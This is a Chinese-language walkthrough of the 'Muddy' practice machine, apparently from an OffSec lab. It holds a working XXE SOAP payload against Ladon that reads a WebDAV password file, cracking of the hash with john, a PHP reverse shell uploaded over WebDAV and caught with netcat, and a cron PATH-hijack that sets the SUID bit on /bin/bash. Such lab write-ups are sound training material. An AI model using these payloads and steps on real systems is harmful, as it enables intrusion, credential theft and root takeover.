主要知识点
- CVE-2019-1010268漏洞利用
- apache配置文件路径
- Linux 系统path 路径覆盖,Linux会优先从靠前的路径寻找可执行文件,借此覆盖相应命令达到提权目的
具体步骤
执行nmap扫描,发现很多端口都开了,不过有用的就是8888
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 20:15 EDT
Warning: 192.168.189.161 giving up on port because retransmission cap hit (10).
Nmap scan report for muddy.ugc (192.168.189.161)
Host is up (0.11s latency).
Not shown: 65503 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: muddy Hello muddy.ugc [192.168.45.157], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Muddy | Found some mud? Call us! – A muddy WordPress!
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
8888/tcp open http WSGIServer 0.1 (Python 2.7.16)
|_http-title: Ladon Service Catalog
对80端口执行dirsearch,发现安装了一个webdav
# Dirsearch started Sun Oct 6 06:59:19 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u 192.168.116.161 -w /usr/share/wordlists/dirb/big.txt
301 323B http://192.168.116.161/javascript -> REDIRECTS TO: http://192.168.116.161/javascript/
403 280B http://192.168.116.161/server-status
401 462B http://192.168.116.161/webdav
301 321B http://192.168.116.161/wp-admin -> REDIRECTS TO: http://192.168.116.161/wp-admin/
301 323B http://192.168.116.161/wp-content -> REDIRECTS TO: http://192.168.116.161/wp-content/
301 324B http://192.168.116.161/wp-includes -> REDIRECTS TO: http://192.168.116.161/wp-includes/
访问8888端口发现enable了 Ladon framework搜索一下得到Ladon Framework for Python 0.9.40 - XML External Entity Expansion - XML webapps Exploit
其本质是本地文件包含,经过调查 apache的配置文件地址 在 /etc/apache2/sites-available/000-default.config,发现webdav的密码位置
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
<Directory "/var/www/html/webdav">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /var/www/html/webdav/passwd.dav
DAV On
Require valid-user
</Directory>
</VirtualHost>
按照poc利用postman调用,得到webdav的password
curl --location '192.168.116.161:8888/muddy/soap11' \
--header 'Content-Type: text/xml; charset=utf-8' \
--header 'SOAPAction: http://192.168.116.161:8888/muddy/soap11/checkout' \
--data '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///var/www/html/webdav/passwd.dav">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<checkout>
<uid>&passwd;</uid>
</checkout>
</soap:Body>
</soap:Envelope>
'
Response
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="urn:muddy" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<ns:checkoutResponse>
<result>Serial number: administrant:$apr1$GUG1OnCu$uiSLaAQojCm14lPMwISDi0</result>
</ns:checkoutResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
本地使用john来爆破密码
C:\home\kali\Documents\OFFSEC\WarmUp\Muddy> john webdav_passwd --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sleepless (?)
1g 0:00:00:00 DONE (2024-10-06 06:48) 1.818g/s 127418p/s 127418c/s 127418C/s softball30..ramarama
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
在Firefox上激活webdav扩展,可以直接上传文件,这里我们更改/usr/share/webshells/php/php-reverse-shell.php 并上传,在本地启动nc -nlvp 1234后访问http://192.168.116.161/webdav/php-reverse-shell.php后得到reverse shell
上传linpeas.sh并运行,发现有一个netstat的cron job,并且我们对于/dev/shm路径有写权限
SHELL=/bin/sh
PATH=/dev/shm:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root netstat -tlpn > /root/status && service apache2 status >> /root/status && service mysql status >> /root/status
bash-5.0# ls -la /dev | grep shm
ls -la /dev | grep shm
drwxrwxrwt 2 root root 60 Oct 6 07:24 shm
由于linux寻找命令是从path从左往右找,如果找到了就会调用,我们可以尝试修改netstat命令,得到root权限
www-data@muddy:/home/ian$ cd /dev/shm
cd /dev/shm
www-data@muddy:/dev/shm$ echo "chmod +s /bin/bash" >netstat
echo "chmod +s /bin/bash" >netstat
www-data@muddy:/dev/shm$ ls -l
ls -l
total 4
-rw-rw-rw- 1 www-data www-data 19 Oct 6 07:24 netstat
www-data@muddy:/dev/shm$ chmod +x netstat
chmod +x netstat
www-data@muddy:/dev/shm$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
www-data@muddy:/dev/shm$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
3c798fbaf8139af5c19c1d314fa139c8